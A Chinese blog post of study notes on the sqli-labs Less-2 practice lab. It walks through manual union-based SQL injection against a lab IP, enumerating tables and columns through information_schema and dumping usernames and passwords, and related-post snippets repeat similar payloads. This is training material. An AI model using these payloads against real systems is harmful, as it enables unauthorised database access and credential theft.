sql注入Less-2

已于 2023-09-16 16:22:49 修改
阅读量200 收藏
点赞数 1
分类专栏: 攻防 文章标签: 安全 sql
于 2023-09-16 15:48:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38595432/article/details/132919564
版权

后台sql

s q l = " S E L E C T ∗ F R O M u s e r s W H E R E i d = sql = "SELECT * FROM users WHERE id= sql="SELECTFROMusersWHEREid=id LIMIT 0,1";

注入语句

http://192.168.200.26/Less-3/?id=-1? union select 1,2,database();–+

使用id=-1 便可以显示union的内容了
使用–+注释掉 limit后面的内容

group_concat(table_name) 去重

通过回显判断闭合方式
在这里插入图片描述

尝试手工注入流程:

1.判断有无注入点 and 1 = 1; true

SQL注入:
随便输入内容 == 报错 注入
== 没有注入

2.猜解列名数量 order by %20 空格

	字段 4个

3.报错,判断回显点 union

4.信息收集

数据库版本 version()
高版本:5.0
系统库: infromation 。。。
数据库名称:database()
低版本:5.0 (低版本没有系统库)

5.使用对应SQL进行注入

查询出表名

	数据库库名:security
	. 下一级  
	infromation_schema.tables 查找表名
	table_name
	查询serurity库下面 所有的表名 

	database()


	= 前后 连到一起
	union select 1,group_concat(table_name),3 from information_schema.tables
	where table_schema=database()

查询出所以密码

	表: users
	如何查询表里面有那些字段? 
	user 字符 转行 16进制
	union select 1,group_concat(column_name),3 from information_schema.columns
	where table_name=0x7573657273

	username  password  字段数据  
	select username,password from users
	0x3a  :
	union select 1,2,(select group_concat(username,0x3a,password)from users)
无双呀`
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
我的白帽之路-SQL注入之数字型注入【sqli-labs Less-2】
Offsett的博客
02-27 372
我的白帽之路
sql注入less2
Mdcq123的博客
10-15 241
http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union selcet 1,database(),3 http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union select 1,(select group_concat(table_name) from infor...
SQL注入——sqli-labs(Less-2)
最新发布
E-Malon的博客
06-02 217
本文章乃 “SQL 注入——sqli-labs(Less-X)” 系列文章之一,如果缺乏相应基础,建议从《SQL 注入——sqli-labs(Less-1)》开始看起。
sqli-labs靶场第二关
gou1791241251的博客
12-19 746
传入id=1查看页面回显 第一步:判断注入类型。如字符型,数值型 传入单引号和双引号,或不传入参数进行测试。在末尾加入–+进行注入sql语句后面的代码 不传入单引号或双引号页面正常 第二步:判断表字段数 使用order by order by 3 时页面正常 order by 4时页面回显异常,所以有三个字段 第三步:使用联合查询获取数据库相关信息与查看页面回显位置 接下来查看数据库名和版本号 接下来通过mysql数据库中的information_schema数据中的tables表来查询所有
LESS2(sql注入
qq_44598397的博客
03-14 896
Less2 源码 输入:http://127.0.0.1/sqlilabs/Less-2/?id=2’ 输出错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server v ersion for the right syntax to use near ‘’ LIM...
SQL注入漏洞解析--less-2
duoba_an的博客
02-22 463
2.这里正常回显,当我们后边加上'时可以看到报错,且报错信息看不到数字,所有我们可以猜测sql语句应该是数字型注入。10用的和第一个数据库一样的,所以里边的内容都是一样的,到这里就结束了。8. 这不,表名(我们用一下users)就出来了,接下来查一下列名。3. 知道时数字型注入后就简单了,和之前第一关的差不多一样。4. 我们就一个一个的试,当输入4时报错不知道第四列。9. 这三个已经摆在面前了,那就看一下下里边都有啥。1.提示我们输入id数字,那我们先输入1猜一下。先查库,在查表和列,最后输出显示。
sql注入-Less-2-4
dahege666的博客
04-03 335
Less-2 添加一个id,响应正常 将'(单引号)添加到数字中 我们得到了一个 Mysql 返回的错误,提示我们语法错误。 现在执行的查询语句如下: Select * from TABLE where id = 1’ ; 所以这里的单引号破坏了查询,导致抛出错误。因此我们得出的结果是,查询代码使用了整数。 Select * from TABLE where id = (so...
sqil-labs sql注入 LESS2联合注入教程
m0_70787202的博客
03-19 170
less2联合注入教程
sql注入sqli-labs-less-2 数值型报错注入
没有故事
03-03 383
' 进行试探,第二关数值型,没有字符串的单引号,所以输入单引号报错,id=1 order by 3 --+
SQLi靶场
diaobusi的博客
10-24 349
在学习SQL注入时,要对SQL的语法有大致上的了解,并且越熟练越好,在进行注入前要仔细分析,它使用的什么类型的SQL语句,以便对症下药,确定类型后,如果是查询类的注入,还要去分析出源语句中,使用了几个字段,当掌握这些信息后,就开始考虑如何闭合语句。判断SQL语句类型构造永真POC判断是否存在SQL注入爆破源语句字段数量爆破成功后即可进行攻击在这一关总体思路与第一关基本一致,只不过在本关中使用的是数值内省SQL语句,在闭合语句方面不用考虑引号等关系。介绍了mysql的一个安全配置项。
SQLi-LABS Less-2,联合注入+报错注入_如何判断less-2的注入点
2401_83974660的博客
04-18 409
页面显示数据库的报错信息,符合报错注入的条件。按照第4个字段排序开始报错,确定字段数为:3。页面正常报错,确定报错函数可以使用。
SQLi Labs Less-1 联合注入+报错注入
wangyuxiang946的博客
06-19 1万+
SQLi第一关,sqllabs less-1,sqli-labs less1
sql-labs SQL注入平台——第二关Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
Onlyone_1314的博客
05-28 1623
只返回了2、3说明,后端从数据库中执行SQL语句select 1,2,3;只在前端显示了第2、3个字段,所以我们能看到的就只有第2、3个字段,就要把注入点放在第2、3个位置上。查询id为0的用户肯定是没有返回结果的,这样返回的就只有union联合查询的第二个查询 select 1,2,3;得到security数据库中的表emails,referers,uagents,users。返回结果错误:没有第4列数据,说明只存在三列数据。查询,返回结果按照前4列数据排序。(3)查询当前数据库的名称。
Sqli-labs靶场笔记2(Less-2~4 联合注入)
m0_52233414的博客
04-01 186
sqli-labs的Less2到Less4三道题都可以用联合注入解决,所以放到一起来记录,联合注入的基本思路方法可以看我的上一篇,这里只针对题目来写。
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1439
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入类型 输入1 and 1=1
sqli-libs————Less2(数字型注入)
Fly_鹏程万里
05-08 1181
Less2同样,我们根据提示传入参数id,数据类型为numeric加入单引号进行测试:爆出错误提示信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' ...
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
SQL注入sqli-labs】Less 1 - Less 5 练习笔记
全栈纸伞
07-09 1042
SQL注入sqli-labs】Less 1 - Less 5 练习笔记0x00 部署sqli-labs这部分相信大部分人都会了,我简单推荐一种简单的组合 wamp 实现一键部署,其中包含PHP环境 navicat 导入数据 这里悄悄的给出一种作弊的方法,就是在每句SQL语句后面:echo $sql. '<br>';如果是练习盲注的同学还是老老实实按照不作弊的方式来。0x01 开始练习L
SQL注入实战:SQLi-Labs完全攻略
"这篇文档是关于SQL注入的学习资料,主要聚焦于SQLi-Labs练习平台,由LCamry编撰。它包含了MySQL注入的基础知识、盲注技巧、数据导入导出操作、增删改函数的使用、HTTP头部的理解以及服务器架构、宽字节注入和堆叠...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值